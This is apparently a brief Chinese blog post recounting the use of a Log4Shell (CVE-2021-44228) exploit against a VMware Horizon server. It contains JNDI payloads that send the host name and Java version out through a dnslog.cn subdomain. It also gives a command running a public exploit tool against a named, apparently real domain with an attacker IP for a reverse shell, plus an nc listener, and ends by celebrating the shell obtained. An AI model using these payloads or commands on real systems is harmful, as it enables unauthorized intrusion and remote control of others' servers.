VMWare Horizon 漏洞利用案例

发表于 2023/09/15

作者 P0lar1ght 1 分钟阅读

前期测试

VMWare Horizon 存在 log4j2 CVE-2021-44228 漏洞

手动复现未果，直接当脚本小子上工具吧。有时候打不进去是因为工具不对！

漏洞利用工具：https://github.com/puzzlepeaches/Log4jHorizon

本次复现流程：

测试是否存在log4j(先利用DNSlog外带出一些基本信息)

${jndi:dns://${hostName}.rn6t7t.dnslog.cn}

${jndi:dns://${sys:java.version}.rn6t7t.dnslog.cn}

攻击机：

python3 exploit.py -r -t system.yghuagong.com -p 9001 -i 101.43.147.82

监听：

nc -lvvp 9001

先开启监听9001端口

利用攻击脚本：

接收到shell：

《上号！》

本文由作者按照 CC BY 4.0 进行授权